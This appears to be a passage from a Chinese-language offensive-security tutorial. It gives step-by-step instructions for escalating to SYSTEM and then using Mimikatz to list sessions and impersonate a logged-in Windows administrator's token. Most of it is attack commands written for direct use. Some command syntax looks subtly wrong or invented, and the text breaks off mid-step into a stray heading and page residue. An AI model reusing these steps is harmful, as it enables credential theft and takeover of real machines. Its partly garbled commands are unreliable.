步骤一：获取 SYSTEM 权限

要窃取管理员的令牌，你首先需要获得比该管理员会话更高的权限，通常是 SYSTEM 权限

方法一： 如果你当前是以管理员权限运行的，可以尝试直接使用 Mimikatz 的 token::elevate 命令，它会尝试提升到 SYSTEM 权限
方法二： 如果当前权限较低，可以通过提权漏洞（如服务权限配置错误、内核漏洞等）来提升到 SYSTEM 权限

步骤二：识别目标进程

你需要找到一个由管理员账户启动的进程，该进程的令牌是你想要窃取的。通常，你可以通过 tasklist /v 命令来查看所有进程及其所属的用户

常用目标进程：
- explorer.exe：这是桌面进程，通常由当前登录的用户启动
- winlogon.exe：这是一个关键的系统进程，与用户会话和登录相关
- 其他由管理员账户启动的应用程序

步骤三：窃取并冒用令牌

一旦你有了 SYSTEM 权限，就可以使用 Mimikatz 来窃取令牌

命令：
1. mimikatz.exe
2. privilege::debug
3. token::elevate
4. whoami （此时你应该看到你是 NT AUTHORITY\SYSTEM）
5. ts::session （列出所有会话，找到管理员的会话 ID）
6. ts::s + <会话ID> （切换到管理员的会话）
7. token::list （列出当前会话的所有令牌，找到管理员的令牌）
8. token::impersonate /p:<进程ID> （冒充管理员会话的某个进程的令牌）
9. whoami （此时你应该看到你已经是管理员用户了）

步骤四：执行命令

当你成功冒充管理员身份后，你就可以执行任何管理员权限的命令，例如：

16.14 桌面有管理员会话，怎么做会话劫持

results matching ""